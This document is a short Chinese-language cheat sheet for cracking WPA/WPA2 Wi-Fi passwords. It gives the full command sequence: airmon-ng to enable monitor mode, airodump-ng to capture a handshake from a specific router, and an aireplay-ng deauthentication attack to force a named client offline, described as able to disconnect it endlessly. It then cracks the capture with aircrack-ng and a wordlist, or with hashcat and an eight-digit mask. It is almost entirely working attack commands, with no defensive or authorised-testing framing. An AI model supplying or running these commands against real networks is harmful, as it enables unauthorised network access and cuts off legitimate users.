抓取握手包
airmon-ng start wlan0 启动网卡 #stop 参数关闭
airodump-ng wlan0mon 搜索周围wifi
airodump-ng -c 9 --bssid 5C:54:6D:5F:90:6C -w /root/zhongzhuan/ wlan0mon #-c 9信道, -w握手包保存路径
如果抓取不到握手包使用以下命令
aireplay-ng -0 50 -a 5C:54:6D:5F:90:6C -c 92:C1:35:98:4D:00 wlan0mon
(使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器)
-0 冲突模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网)强制使对方连接断开,不得不重新连接
-a 指定路由器的BSSID
-c 指定强制断开的设备
后面是获取到握手包的破解(aircrack-ng和hashcat)
aircrack-ng:
aircrack-ng -w /root/zhongzhuan/1.txt /root/zhongzhuan/zue-01.cap #这个aircrack-ng比较慢 -w 字典 握手包
hashcat:
aircrack-ng /root/zhongzhuan/zue-01.cap -J wpahashcat #转换为hccap格式
命令:hashcat -m 2500 -a 3 wpahash.hccap ?d?d?d?d?d?d?d?d #-m 破解类型(wpa/wpa2) -a 掩码暴力破解 后面的格式 表示密码的位数